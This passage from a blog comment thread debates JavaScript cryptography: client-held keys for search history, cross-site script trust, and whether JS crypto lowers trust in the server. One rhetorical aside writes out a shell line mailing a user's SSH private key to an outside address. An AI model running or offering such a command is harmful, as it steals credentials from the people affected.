      1. Yes, I see that a standard SSO solution works. Indeed, the form is never submitted to the secure server (so in particular, it doesn’t validate the password) – the minor advantage of saving a single round-trip is the entire “point” of this protocol. But you’re right that this scheme falls prey to an offline dictionary attack that I’d failed to consider; sorry!

        I don’t think it’s possible to get a pair of (E(), c) – note that E(PBKDF2(password), c) is sent over a HTTPS connection between the secure host and the client, so I don’t think an adversary can get both. However, an adversary can get E(), and can check the decrypted data for validity if it has sign(sk, c) (from the insecure host; network access probably suffices.)

        Of course, we can introduce rate-limiting by requiring the insecure host to contact the secure host in order to verify a password, as you suggest; but that’s hardly elegant. I’ll try to think a bit more about this tomorrow; sorry for posting nonsense…

  13. This is an example from some actual code I implemented at the company I currently work for. And we in fact used a js crypto lib to do it, so maybe it’s relevant to this post’s discussion.

    For sake of simplicity, let’s say my company has a web application that has searching capabilities on large and complex data sets. And we have two different types of users — 1) those who, by requirement of their employer, MUST have a record kept of all their search history and 2) those who, by requirement of their employer, MUST NOT have a record kept of their search history.

    For (2), the requirement (and paranoia) are so strong that those customers require that WE not store any record whatsoever that could be used to re-construct what searches they made. We literally have disabled web server logging as part of compliance with that request. They go to great lengths to have user’s browsers running in in-cognito mode where cookies and browser history are not kept.

    So, with such opposite use cases, I devised the following system:
    – for users of (1), they opt into “tracking” of their search history. for users of (2), they simply don’t opt in, and are thus implicitly opted out of any tracking.

    – for those (1) with “tracking” on, what happens is this:
    1. the server first generates a random “key”, which it does not store in any way, and transmits that key to the client via HTTPS, and then forgets it.
    2. the browser keeps that key in memory, only via a session cookie (goes away when the browser is closed).
    3. each time a user does a search, the javascript takes the key, and captures and encrypts the browser’s URL (for a search), and encrypts the URL with the key.
    4. then the javascript sends the encrypted value (without the key) back to the server via a separate XHR request.
    5. the server stores in a cache db table all the encrypted values (which it can’t do anything with, without the key, of course), along with the user’s id.
    6. if/when a user wants to retrieve their search history from that browser session, the javascript requests all the encrypted records from the server (which it then empties the table after sending), and the javascript uses the in-memory key to decrypt and display the URLs.
    7. the cache db table clears out every 12 hrs, and is also proactively purged when a user explicitly logs out.

    With this system, we have plausible deniability that we have no tracking of user’s history that we (or anyone who got ahold of DB or logs) could do anything with. The user (and in fact, their browser session) are the only ones that can decrypt the data. As soon as the key is lost, the data is now permanently inaccessible. And key and data are never stored in the same place (other than the temporary memory and display).

    The primary reason we didn’t just tell users that want to “track” to use their browser history is ease-of-use (they want a simple way of copy-n-pasting that history). But it’s also because we use #hash URL changes for search params, which don’t always in all browsers end up in reliably separate and accessible search history entries.

    1. Kyle, this sounds like you are trying to use encryption to create privacy. But does it work ? Because you use a session cookie to hold the key, it will be transmitted to the server each time you request some object from the server and thus the server can connect the user to the key. Not sure why you use the session cookie anyway.

      Probably if someone can get hold of the logs, they might also have access to the webserver configuration, they could log the cookie, userid/-name, etc. in the logfile. Or just look at the IP-address, I guess. :-)

      Maybe you should explain a bit more about what you are doing. :-)

      1. Lennie-
        The reason for storing the key in some “persistent” place client-side is so that it’s preserved across page refreshes (so they don’t lose their search history upon page refresh or page navigation). One place to store the key is a cookie, which I actually mis-spoke in saying that we use. In fact, we store it in the browser’s window.name property.

        Moreover, if we had to use a cookie to persist the key between page refreshes, it would seem one way to prevent it from going back to the server would be to set it (using javascript) in a cookie for the page’s domain, but make our Ajax requests to a different domain (cross-domain Ajax via CORS, JSON-P, etc). In that way the browser wouldn’t transmit the cookie (with the key in it) back to the server.

        BTW, we only generate the key on the server as a way to take advantage of better randomness. Of course, the key could just be generated in the JavaScript, but we didn’t trust it as much. If server compromise were a concern, we could keep the key only in the browser in that way, as I think keeping the key and encrypted values separated provides decently reliable protection.

      2. Depending on domain name to isolate cookies seems kinda fragile. You don’t want a site redesign to break your assumptions. It’s better to keep it a local property that is not sent to the server without active intervention.

    2. Can you elaborate on why you don’t just store the client history in the same place you store the key?

      Also note that the encrypted data does contain some information (length and timing of the queries). Finally, note that this is not exactly (claimed to be) “host-proof”.

    3. Kyle, I was thinking, with a compromissed server you’ll always be screwed as they can change your javascript.

      Have you thought about storing it clientside somewhere else: html5 client-local storage, goolgle gears local storage, html5 client-side database.

      But I guess you would. :-)

      1. Every client-side persistence mechanism is space limited. Some are more limited than others. But the legacy browser support that we require (back to IE6, ugh) dictates that we limit our options to something that works everywhere. That limits us to cookies (already discarded per above), window.name (limited to 2000 chars max), and flash LSO’s (flash discarded because of the UI complexities of exposing the storage size UI in a friendly way, etc).

        Our typical users that are keeping track of their session history are performing sometimes 300-500 different searches in a single session (we track each filter change as a unique search). The URLs themselves are quire long, sometimes 200 or more characters. It was estimated that more than half our users would run out of space in something like a cookie, window.name, or even a flash LSO. As such, we needed a persistence location that was not space limited.

        This is actually the primary design motivation for how I built the system, to store the history in the DB on the server (so it’s not size limited), but keep the key for decrypting the values only in the browser. Each side then has only half the answer, and that provides “pretty good” protection.

        Yes, if the server is compromised, there’s no way to guarantee protection. But keep in mind there’s different levels of “compromised”. There’s the “read-only” compromise (looking at logs, DB, etc) and there’s the “read-write”. We’re pretty well protected in the “read-only” compromise, and we accept that a “read-write” compromise is nearly impossible to prevent given a motivated enough hacker.

      2. The “read-only” compromise is a myth. If it existed, a read-only compromise of session key and then your database is enough to expose the history. Worse, since the URLs are written to disk, the latter component persists for an even longer time.

        Example attack: read old history from disk, then guess keys because you used Debian PRNG to generate session keys.

        I’d prefer the less-persistent memory-only log vs. this thin veneer of crypto. But like the example I used in my post (loophole to avoid PCI audits), there may be a business case for misleading your customers.

    4. No offense, but this is exactly the kind of false hope JS crypto gives. Your server generates the random session history key, sends the JS code to the client, and stores (presumably on its hard drive) the encrypted history records. So a sysadmin debugging an issue has all the data needed to reconstruct the history, assuming they turn on logging of the session key or change the code to send the user a known debug key.

      Instead of all this complexity, what about storing the history in an in-memory buffer on the server? You can mlock() the data into RAM to be sure it doesn’t hit swap and even disable various debugging routes (ptrace, /proc, /dev/mem, etc.) No crypto required and you have the same level of plausible deniability. If you’re concerned about performance of 3-500 URLs, do compression on the buffer.

      I don’t think your requirements are clear since the current design doesn’t actually meet the requirement “MUST have a record kept of all their search history”. Access to that history is lost when the browser closes.

      Also, did you really consider the client-based history approach or discard it because it wasn’t cool enough? A quick google search shows this easy way to cut/paste URLs:

      http://www.techsupportforum.com/microsoft-support/internet-explorer-forum/151111-copy-paste-history.html

  14. Now that I think about all this client-localstorage stuff.

    Maybe we could all make it work if we had:
    – client-local-keystorage (per domain ?)
    – javascript/html (sometimes server) only handle encrypted data
    – have a special textarea with extra GUI which can be used by the user to decrypt data. The attributes on the textarea only specify how to decrypt the data (high level methods and keyname) – the user would be prompted: do you want to allow data in this field to be decrypted with key X
    – have a special file api with extra GUI which can be used by the user to decrypt files
    – a browser which had a number of highlevel encryption methods builtin, which can be controlled from the GUI’s mentioned above. Which can be checked by people in the know and can be used by users and people building websites without having to know the details how to implement these things properly.

    Would that make any sense ?

    1. Only your last point (browser-supported APIs for crypto) would really change anything. You would need:

      – Secure protected keystorage
      – Every browser user has an identity (keypair, cert) stored there
      – Ability to import keys, authenticate requests, etc.
      – High-level crypto ops such as “encrypt/MAC message to recipient X”

      Funny enough, I just described PGP.

      This kind of thing won’t happen for a very long time though because fundamental questions like “how do I take my keys with me to another machine or browser install on the same machine?” are difficult.

  15. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.

    1. Your page can’t set document.domain to “example.net” unless its origin is example.net or a subdomain such as http://www.example.net.

    2. Another page loaded from ads.example.net will not be same origin with example.net unless it also sets document.domain to “example.net”.

    Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src=”evil.ads.com”></script>. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net‘s origin (whether it has been modifeid by document.domain or not).

    In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would.

    This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.

    /be

    1. Bendan, thanks for the comment. I read the bulk of it as “it’s even worse than you think, and document.domain is not the main problem.”

      Regarding your #1 and #2, I was assuming the page was loaded from http://www.example.net with two scripts on it (one for crypto and one for ads, sourced from subdomains of example.net). If the script from ads.example.net set document.domain for its own convenience, now all scripts on example.net can override the crypto script by setting DOM elements on the same page (not discussing loading another page).

      1. Brendan, thanks for the comment. I read the bulk of it as “it’s even worse than you think, and document.domain is not the main problem.”

        It usually is (worse than you think), to quote Mal Reynolds (“Serenity”).

        I don’t think that document.domain is especially relevant, but you could argue it ups the ante because cross-site scripts dilute trust and yet can set document.domain. I hear you, but my response is to attack the primal flaw.

        Again, if you have one page loaded from a superdomain, or two pages loaded from subdomains that join to the superdomain via reciprocal document.domain settings, loading scripts cross-site includes those scripts in your “trusted computing base”. This is the primal sin.

        Regarding your #1 and #2, I was assuming the page was loaded from http://www.example.net with two scripts on it (one for crypto and one for ads, sourced from subdomains of example.net). If the script from ads.example.net set document.domain for its own convenience, now all scripts on example.net can override the crypto script by setting DOM elements on the same page (not discussing loading another page).

        This is correct, but it may leave the impression that the scripts coming from subdomains of example.net is relevant or necessary. It’s not — the scripts could come from anywhere, and because you src’ed them, they run under your (the including page’s) origin trust label (AKA principal), so they can set document.domain just as if they were inline scripts in your page. They were #included.

        Note my use of *page* vs. *script*. The “origin” in the same-origin model is a trust label that comes from the page’s redirected-to URL. It is the principal for all code loaded by that page, whether via inline <script> tags, <script src=”http://www.example.net/scripts/fun.js”></script> out of line yet same-origin script loads, or truly cross-site script loads.

        The problem is cross-site script loading. My W2SP 2009 talk proposed putting cross-site scripts into a penalty box: a trust label under the including page’s origin in the label lattice, which could have (by default policy; adjustable by the including site with policy knobs) strictly fewer rights to the including page’s DOM, cookies, etc. — including document.domain setting.

        We’re going to implement something like this in Firefox, post Firefox 4. In Firefox 4, we have CSP.

        /be

  16. I updated the epilogue of the post again:

    * Since it was so interesting, listed Brendan Eich’s comment on cross-site scripts
    * More accurately characterized Daniel Franke’s proposal re: “proof of work” systems, based on his comments.

  17. Nate –

    I’d like to start out by saying, at a high level, that your analysis, while accurate from purely security point of view, seems slightly myopic and baseless in the context of current technology trends, cultural technology patterns, history, and real human beings.

    For sure you are aware that pretty much all the players in the internet are aiming to promote javascript to become a first class application cititzen: faster js engines, browsers that have tighter integration with the OS, application stores that are built to house js apps, and even new peices of hardware meant to do nothing *but* run a browser as the entire operating system.

    I am also sure you are aware that, by any objective analysis, we can say that a simple, ubiquitous, secret sharing technology has never gained traction with non-nerd computer users: PGP is utterly worthless to the normal consumer. People who don’t regularly use usenet or protect their pockets with plastic haven’t ever even heard of it nor will they in the future because the the technology requires the discipline of each and every particpating client for it to work – it’s not feasible to have a solid PGP system where some users are non-technical. A decade of people trying to figure out how to get normal people to use it can only come to one conclusion: you can’t. It’s provably a failed concept.

    The reasons why are so important in the context of normal people wanting to exchange secure information that I amazed the experts considering the security of consumer systems seem to regulary ignore them because a perfectly secure but unused system provide *zero* secrecy to its non-users.

    Consider the following scenario as the context for my commentary: three people wanting to share banking numbers as part of a small construction project to build a mother-in-law’s studio.

    1) myself. a nerdy linux programmer that understands pgp, ssl, rsa, and how to keep my machine free of viruses.

    2) my mother. running who knows what version of a buggy windows system.

    3) my wife. who accesses much of her information on her phone.

    I don’t think I have to explain why a pure client based encryption system is a non starter here: simply getting my mother to install and upgrade reliably anything as complex as PGP is totally out of the question. Because she lives in Alaska me doing it for her is impossible. As for my wife, although I could probably figure out how to get some third party PGP application on her phone, unless it was fully integrated with the native email application rest assured it would go unused – add to that my lack of confidence in the effectiveness of some app store developer’s crypto knowledge, further doubts about the ability of the phone’s hardware (random number generation) to get the job done, and fear of my wife leaving here unlocked phone somewhere with a private key sitting on disk and hopefully everyone reading can agree that this trival real world use case essentially neuters the PGP approach from the get-go *regardless* of the efficacy of any cryptographic techniques it might employ.

    Considering that data is only as secure as the the total security of all systems participating in the secret sharing and we can see why, in the general case, real world PGP is useless at protecting secrets except in very special cases where the kinds of users and systems participating can be tightly controlled and understood – a company intranet or government email system for example.

    Now, assuming that the three of us, myself, my mother, and my wife, would be confortable with a system that at least secured the storage of our information but did not ensure privacy (your second system) I would say that just getting all third parties to use gmail with https would be a more reasonable approach than relying on some new, untested system that would manage private keys and encryption on the server. I personally trust google to protect my data from attackers more than I trust some random new SASS offering. Also, as someone who understands RSA encryption in general having the keys managed on the server doesn’t give me any warm fuzzies with regard to data *privacy*. I’m more concerned with some underpaid system administrator sniffing my bank account than some google employee, let alone a third party attacker, doing the same. In summary, unless a service is at least *trying* to hide my data from its employees I’m flat out going to assume that my bank account numbers are known to all of them and probably are accidentally written to log files somewhere to boot. Without some attempt at a privacy layer between myself and the server I’d just assume use gmail+https so for myself, and anyone who cares about privacy, your second suggestion is a non-starter too.

    Where does that leave us? I think that that it’s entirely accurate to say that exchanging secrets securely and privately by normal, non-technical, users is a real world need underserved by the technical community on the basis of their insistence on refusing to acknowledge the usage patterns and willingness to learn new skills of real world users in real world sitatuions: not everyone runs the latest *NIX kernel on a stationary PC. At the same time real people are exchanging more and more private information on a variety of devices and platforms. I beleive that only a HTTP based solution has any prayer at keeping up with the proliferation of devices, platforms, and usage patterns we are currently seeing in the consumer space and that the demands users have regarding data privacy are only going increase. While there certainly might be technical limitations to what can be done in today’s browsers with today’s javascript it’s simple pragmatism that is inspiring us (dojo4.com) to build a tool that uses least common denominators to provide a hybrid (js in the client and openssl on the server) system that will be more ubiquitous and simpler to use than current client systems and much more secure than https based email exchanges and will therefore be more viable for real people than anything that currently exists. We’ll be more than happy to provide you all sources after our beta launch of http://cryptic.ly (feel free to edit that url out if you are uncomfortable linking to it from your blog) and look forward and analysis or comments you might have as a tester or code reviewer. We firmly believe that the web is the new operating system and that it’s non-optional to give up on privacy and security simply because the nature of computing is undergoing a transformation. Without that sort of challenge there’d be nothing fun for us to do! ;-)

    1. I don’t think anyone disagrees that usable security is good. In practice, this often means using HTTPS and trusting some company to run their servers securely (your gmail example). Such trust seems to work, usually, but you don’t need, or want, Javascript crypto. The people arguing for JS crypto usually want “host-proof security” or such, which seems impossible to achieve.

      I don’t think I really understand what you’re saying.

    2. It seems like you put a lot of time into your note, so let me try to distill it:

      – No one installs client-side security software (PGP)
      – Everyone has a browser
      – So JS crypto is better because it can be widely used

      My whole point of this post is you could achieve the exact same trust model with server-side crypto. And this would not have the disadvantages I pointed out (1-7 in the post) that are unique to JS crypto. Server-side crypto still works via a browser with HTTPS and would be just as widely usable. More-so if you count people using NoScript.

      I see you have a horse in the race with your JS crypto notes service. It’s when you say that “Your notes are private because even cryptic.ly can’t read them” that I think you are being misleading. There is no difference between these two scenarios:

      – Admin attaches debugger to your server-side crypto process to debug something, sees user’s passphrase
      – Admin adds logging to SEKRIT_CRYPTO.js to debug something, sees user’s passphrase

      The reason there is no difference is that the trust model is the same. In both environments, all the trust is in the server. So JS crypto can only be as good as, never better than server-side crypto. Given that it can only be as good as or worse and has significant other weaknesses, why mislead your users?

      1. Nate –

        Your paraphrase is mostly accurate. Sorry to be so wordy.

        But I disagree that the trust model is the same. It *is* of the same quality, but not quantity. For example, I ride my bike to work everyday. I happen to ride very expensive bicycles and, therefore, never leave them anywhere unattended at night. I do have to look them up from time to time, however, but always do so in front of a window. Either the window of my office or the window of the coffee shop, etc. This prevents some opportunist from simply walking off with my bicycle. Similarly, using js-crypot means that, for instance, a developer with access to our server could not simply grab passwords using ‘tail -F’. Someone grabbing backups could not look at web server logs and snatch sensitive data. To read the data would take a much more sophisticated attack. Combined with locking down the server and access to it in general this is actually a huge trust system because it less clever people need to be trusted less ;-) Simply put, it dramatically reduces the number of people capable of mounting an un-noticed attack while simultaneously increasing the time it would take to mount an attack. A concrete example is that having a deploy key, but no shell access, would make the attack you describe pretty dang hard to mount – I am certain no copy editor or designer we work with is capable of it. In fact, this is simply a ‘trust work function’ – by making it harder one can trust less. Most people have locks on their doors but continue to have windows in their houses based on this same line of reasoning which, somewhat surprisingly, bears itself out in the real world.

        For the record we would never assert that js crypto is *better* than server side crypto – merely that it allows the user to trust us *less* while still being confident enough to use the service.

        Indeed, it is *precisely* this line of reasoning that has caused you to deduce that the paradigm of downloading js from a sever and running is is somehow *less* secure that running some MUA with PGP. Consider, the average *highly technical* PGP user is simply going to run ‘port upgradeself’ or whatever, as root, and slurp down loads of un-audited bits of scripts and dlls from a loose collaboration of software mirrors located *somewhere*, by, *someone*. Sure, there a signatures there, but we know from experience/history that the package management system have been a vector for successful attacks many times. Recall that each install script has access to every other package – as root – during the the install. As we speak their are rotten versions of some of my own open source packages on rubygems.org – through a bug in some sync code. As far as I know there are no security flaws in them. I hope not, some of them are installed on your box if you run OSX or LINUX. Updates are on github, but not on your system.

        The only reasonable thing to say about this paradigm vs dynamically running code from inside a browser is *less* verification happens (https + certs give some degree of verification) and that one methodology results in running unverified code *more* than the other. Still, it’s really shades of grey isn’t it?

        In the end I think an honest person will say that, when it comes to running software that is downloaded from the internet, the user is basically eff’d with respect to security. I’ve written code for classified systems and know for a fact there simply isn’t a wire into these buildings and that no media is allowed inside for this exact reason. They even charge the glass so you can’t listen to the windows. The basic premise is ‘outside bad’ and ‘inside good.’

        In general I think that people are so busy standing up straw-man arguments that the are missing huge opportunities the re-think the way we’re doing things to provide a safer, more private, experience for users. Some random food for thought:

        – local storage isn’t good for keys, but it could be great for the *entire application*. if you downloaded it once, like normal client software the frequency of updates/verification means that slightly more manual procedure is possible. tidlywiki does this now.

        – c code absolute sucks to audit. so does fortran. so does java. python, ruby, and javascript are much simpler to audit. this is a huge problem in science right now: no can read the terrible libraries so few eyes actually do audits despite the fact that said libs control weather forecasts for flying, etc. openssl exemplifies this to the Nth degree.

        – there are vastly fewer browser platforms than there are operating systems if you consider mobile devices.

        – there is no reason a js-crypto app needs to store it’s data on the server *or* the client. authenticated/https PUT links could allow only the code to come from the server. combined with js-crypto and html5 local storage for the app itself this could be a powerful combination since the user’s credentials would separate code from data and the third party (in this case amazon) would simply see chunks of encrypted text from who knows what application being stored for some teeny subset of it’s users with no way to determine which application created them.

        In short, I honestly believe that if people started brainstorming about the problems from the user’s end that solutions to those new paradigms could be developed with *today’s* tool sets.

        Kind Regards

      2. For the record we would never assert that js crypto is *better* than server side crypto – merely that it allows the user to trust us *less* while still being confident enough to use the service.

        A developer who would never log passwords in their server-side app can also be trusted not to log them from your client-side JS. Likewise, someone who does add logging of them on the server side can be expected to do the same for client-side JS also.

        JS crypto does not allow users to trust you less. They have to trust you exactly the same amount. And, they have to trust you to do a good job despite the limitations (points 1-7) of JS crypto.

        All I’m saying is “why handicap yourselves right from the start by making it harder to do a good job?” Since there is no difference in trust model, use the environment that gives you the greatest chance of success.

        Any claims that JS crypto allows the client to trust the server less are wrong. It trusts it just the same amount.

      3. Nate –

        I understand completely your trust analysis. I guess the reason I am still not liking the the conclusion for two reasons

        1) I do not want to accept that there is no solution which can provide a greatly level of privacy to the user. Using a PGP enabled MUA suffers from the same trust relationship (I have to trust that the author is sending system reports of /etc/passwd to his russian address… etc) and yet people, including those in the crypto community, seem to be totally comfortable with the idea that these kinds of clients afford privacy – “mail -s HAXOR ara.t.howard@gmail.com < .ssh/id_rsa # at coffee shop" aside…

        2) I think only half of your 1-7 are correct.

        1.,2., and 3. have *nothing* to do with js, browsers, or technology at all and are easily solved cultural issues. They are basically straw man arguments.

        4. seems backward to me – in the browser one has a toolkit that has access to all system primitives AND which has decades of work evolving at to be a safe container for executing arbitrary code from the internet. Compared to MUAs it's an *infinitely* better candidate for providing privacy from a code provider that any other tool on the system. For instance, no MUA in the world has a domain security model for it's plugins… This is, however, your strongest objection for sure.

        5. is simply false. random.org is great, it's https, and probably better that every single mobile phone's prng.

        6. is also false. there are actually only a few browser environments that matter for 95% of the market. Developing client software for even one OS, for instance linux variants or windows variants or palm os, provides more platforms than this.

        7. is a straw man. this situation exists for every package management system in the world, for some more than others – windows updates alone render this criticism invalid.

        There are other pretty huge stretches: saying that 'view source' doesnt' work because it can't show you the actual code is like saying reading c source isn't valid unless you know which compiler flags were used to build the binaries… etc.

        Honestly, I bet you could come up with 7 reasons why people should not use a PGP enabled Outlook mail client as well and not one takes any issue with someone saying that system give it's user privacy.

        Do you disagree strongly with all of what I've said, or maybe just some?

        In the end I think that traditional client software has *exactly* the same trust model as running javascript: I publish code for you to run, you download it from the internet, and then you run it. Nothing can change the fact that the ultimate trust relationship in both cases is that you, the user, trusts me, the author, and the distribution chain as well.

      4. I’m sorry, but “random.org” as a response to “clientside JS has no cryptographic PRNG”? I can’t take this seriously any more.

        I’m going to assume that nothing I say will convince you to convert your notetaking website from JS crypto to server-side, and we should just leave it at that.

      5. Ara, you don’t appear to understand the points Nate is making.

        You take exception to (1), (2), and (3) because nothing in the Javascript standards dictates that JS couldn’t have trustworthy, peer-reviewed, high-level crypto frameworks built in the future. “That’s not fair!”, you seem to imply. Attackers don’t care about “fair”. The point Nate is making is: because of those factors, any developers who wants to build a crypto-protected note-taking application has to implement their own crypto framework from scratch, and, from a decade and a half of professional observation, even full-time professional cryptographers who attempt to build frameworks from scratch manage to screw it up.

        You take exception to (4) because, as you see it, browsers are more secure than other desktop programs. That’s not Nate’s point. When you build crypto code into an MUA, you aren’t overloading SMTP or MIME to do key exchanges; on the other hand, when you attempt to run crypto out of a Javascript, you are completely at the mercy not only of all of the browser’s baroque rules regarding origin and content from the DOM, but also of all the side effects of those code that implements them.

        You take exception to (5), and suggest that instead of a secure random number generator, developers can just make async calls to a web service to provide random number generators. Had Nate been as creative as you, he could have summed his whole argument against JS crypto up as, “JS crypto is so bad, you’ll consider making async HTTPS requests simply to fetch random numbers from RANDOM.ORG”.

        You take exception to (6), arguing platform diversity isn’t a real challenge for Javascript development, which is to say that you think it’s easier to make crypto work securely in browsers than it is to render text in different fonts; you also seem to think that as long as the language behaves similarly at a language level on multiple platforms, the security impact of coding decisions for those platforms will be the same.

        You take exception to (7), clearly missing the point, which is that in a desktop or server environment you make a deliberate decision to install and run code, and that decision gets made perhaps once a month; browsers run content controlled code and make that decision every couple seconds.

        Again, your arguments about Javascript cryptography seem entirely based on how you want the world to work. One imagines that when someone finds a terrible flaw in the security model of “cryptic.ly”, you’ll be fully prepared to blame it on browsers. The hint of exasperation you’re picking up in this post and these comments is from prolonged contact with people who provide crypto tools to end users without taking responsibility for their safety.

      6. i still cannot see how the trust models are the same: if one does pure server encryption the client has ZERO chance of detecting an attack. if the attack involved modifying js the client has SOME chance of detecting an attack. this really is not the same.

      7. Thomas –

        re: 1,2,3. i understand that. however i’m most concerned with technical barriers, not cultural ones. of course being aware of both is important, but i’m mostly interested in focusing on technical barriers.

        re: 4 is legit and a major concern i agree. it’s not impossible though.

        re: 5 honestly, if you’d trust me to run openssl on a server on your behalf, why wouldn’t you trust random.org to give back good random numbers. after all, you have no idea what i’m doing on my sever – i might be using random.org there!

        re: 6. if you evaluate that concept in the context of ‘any mobile platform’ then yes, i think it better to assume uniformity of js platforms before os platforms.

        re: 7. maybe you’d missed the developments happening in js, but there are tons of ways around this, not least of which caching locally the js to be run in html5 storage. again, this is a teeny technical issue to solve.

        for the record, my arguments are not based on ‘how i want js crypto’ to behave, rather, they are based on the desire to do something better that gpg for average computer users, for whom it does nothing.

        regards.

      8. Ara, you still don’t understand (7). The issue is not simply that you can’t, in any modern browser, reliably verify the crypto-bearing Javascript you’ve been fed from a root of trust. It’s worse than that: the issue is that even in the fantasy world where you could do that single verification step, you still can’t verify the whole Javascript runtime. It’s fed from multiple sources, not just a single tag.

        People keep making the same conceptual mistake of assuming that the Javascript verification problem is simply that of “here’s a .js file I requested, is it the same one I saw last time”. That’s not the challenge; it’s just a tiny part of it. The challenge is, using that (currently nonexistent) tool and several others, verify the entire state of the Javascript runtime, because if it at any point comes into contact with a tainted DOM element or a tainted script, the whole interpreter can be silently hijacked.

      9. When I read some of the comments again I think, it’s all a matter of trust. What do you trust ? Personally I think we are all cynical bastards and don’t trust anyone. :-)

        We know people want to create applications in the browser which they think need crypto (heck they do that now and it does not work). They do this because they want to create privacy. Only for the data being sent. These people very well understand that when the server is involved the server can log who is communicating with whom. The webapplication or server can make a copy (like logging ir BCC) or sent it somewhere else. But that is exactly why they want crypto at the client. Only reveal the cleartext as late as possible in the process, as near to the user as you can get it.

        Side A: this is because I don’t trust the server.
        Side B: then you can’t trust javascript, because it came from the server
        Side A: then you should add it to the browser
        Side B: but why not create/use a real native application instead
        Side A: but the native application was downloaded from an internet server as well, so how is that more secure ?
        Side B: but with a browser application you download javascript and many other parts, you can not verify it as a whole
        Side A: sure you can, create an extension to the current html5 offline-application-cache-manifest so the browser can check what it is running
        Side B: but how does the browser verify this ?
        Side A: we use the same SSL-system we do with native applications, they will be signed or put it in DNS, signed with DNSSEC
        Side B: …

        Can I ask something else ? as I don’t think this discussion is going anywhere.

        A question for ‘Side B’: do you trust SSL in the browser ? Do you trust the CA’s ? Do you trust the government where the CA is located. And how about for every CA ? Do you trust your native application ? Is the browser not a native application ? Do you trust DNS ? Do you trust the vendor of non-open-source proprietary software or do you trust open source software ? Do you trust the firmware and hardware in your system ? Do you trust your compiler ?

        Or put an other way: what can you verify ? And how do you do that ? I assume you atleast verify that which you can, but I doubt this is the whole stack.

        So I say, perfection is not possible, people are building and will build these systems. So can we please help them to create systems that are as secure as possible ? Based on known secure protocols and methods. With API’s which help prevent mistakes and guidelines how or how not to use them. Maybe implemented with process seperation and sandboxing and who knows what else.

        I agree Javascript should not handle the plaintext, I think the browser should do it and the user should give the browser a passprase or passprase of a the keystore.

        I can’t imagine this is all that different from client-certificates for https we already use. Or what is implemented in Firefox Sync for example.

      10. Thomas –

        I understand #7 completely. It’s similar to the issue with have ld.so and it’s versioning scheme: if you run a software update, despite the fact that you’ve ‘verified’ the signature of some random library or piece of software you certainly haven’t verified it in combination with the *particular* libs it will runtime link to on your *particular* os. js really isn’t unique here, we just don’t think about our operating systems as containers to run arbitrary code downloaded from the internet in unverified configurations when, in fact, they are *exactly* that.

        I maintain that nearly every comment on this page doesn’t really understand that fact: verification means *nothing* outside the context of a known hardware and software configuration. no one does this except certain off-net systems.

      11. Lennie – nice to see at least one person hasn’t given up on the problem – that *normal* people currently have *zero* usable systems of exchanging digital secrets despite > 1/2 a century of cryptography + comp-sci

      12. ara.t.howard – I’m sorry to say this, but being unwilling to accept that something is impossible does not make it possible. Note that different fields have different definitions of “impossible”, and cryptographers’ is closer to mathematicians’ than to engineers’. I’m now going to do something more useful than responding to you again.

        Lennie – what makes you think Nate (and, for that matter, Thomas, and even me) don’t want to have the best crypto implementations possible? That is why we are spending our valuable time telling everyone not to use Javascript cryptography.

      13. ara.t.howard well, I came here not to cry about how bad the situation is (it is), but to say we should improve the situation. If we really want people to use things like Chrome OS and put all our data in the cloud, then I think we need crypto. For many years, when people asked me, I always said: create a ‘web-application’, you can have it hosted where you want or you can run it like an intranet or on your private cloud or even on your NAS-box or a $100 US wall plug. With a standardscompliant web application (not some IE-only or even webkit-only thing) you have multiplatform application, thus you won’t be stuck with a single toolkit. When mobile comes to the web you can access your application from anywhere you want. When/if Linux starts to suck as a webserver, you can move it over to a BSD, Solaris Mac OS X or Windows without having to change the frontend.

        Now with “HTML5” we seems to have a lot more tools and standards to make it act more like native applications. Mobile is leading the way with touch. Their is even hardware acceleration and a standard for a subset of OpenGL. But what is missing ? Crypto. With the speed improvements of javascript engined and CPU’s, advances like multiple cores and webworkers people are even more likely to build crypto into their applications. because it isn’t slow anymore. The problem is obvious, coding this in javascript is useless it is a security nightmare, it always has been.

        The only thing that is supposedly secure in a browser which uses crypto is TLS. The page doesn’t interact with it directly, the browser does the work, the page just does it’s own part.

        So let’s do the same with messages. Maybe even files, as HTML5 already supports drag/drop, their is even experimental API for whole directories.

        TLS has always been seen as slow. Slower on the server and slower to connect with. Now that Google has looked at SSL/TLS and the HTTP protocol more closely we see big improvements. SPDY, False Start, etc. Because I don’t think anyone expects SPDY to work backwardcompatilbe in the field when it is just used for TCP/HTTP. Their are still to many proxies out there which will not understand it. While they will allow CONNECT on tcp port 443 just fine. So I think TLS with SPDY, etc. could even be faster then just plain TCP/HTTP.

        Yes, Their is still a very long way to go. We still have not achieved a 100% marketshare of browsers which support SNI and IPv4-addresses will be harder to come by. We still haven’t solved the problem where any CA can create a certificate for anything they want. But possibly their is a solution for that too, the root is signed with DNSSEC which can be used to verify data in DNS. Will this solve those problems next year ? I doubt it, but their is a way forward.

        I see the same hesitation or even plain disgust with IPv6. Yes, IPv6 was created more than 10 years ago and they tried to solve problems in ways we might not have done if we had to do it all over again. But IPv4 depletion is here and IPv6 is our only real choice.

        IT doesn’t exists to create jobs or wealth, it exists to find solutions to problems and implement them.

      14. Nate –

        How can you on the one hand assert

        “a crypto web service provides both read/write access to secrets and messages should be trusted by users”

        and on the other assert

        “a web service that provides merely read access to random bytes should not be trusted by users”

        this seems like quite a logical contradiction to me: if your propose that a user should be able to trust and entire crypto stack on a server why wouldn’t individual components, like csprng, key generation, etc, also be able to be provided by a the same service?

        If you’re hung up on https://random.org/ as the url just replace this with https://natelawson.com/urandom – point being, lack of csprng in js cannot be a technical barrier since this component could easily be provided via a web service – perhaps simply exposing the csprng of the exact server side system you’ve been recommending.

        Despite everyone’s insistence I do feel you’ve managed only to show how js crypto is young and very hard to do – not that it is technically impossible.

      15. @ara, I didn’t say either of those things you quoted. I’m having trouble even figuring out what you’re claiming I said there.

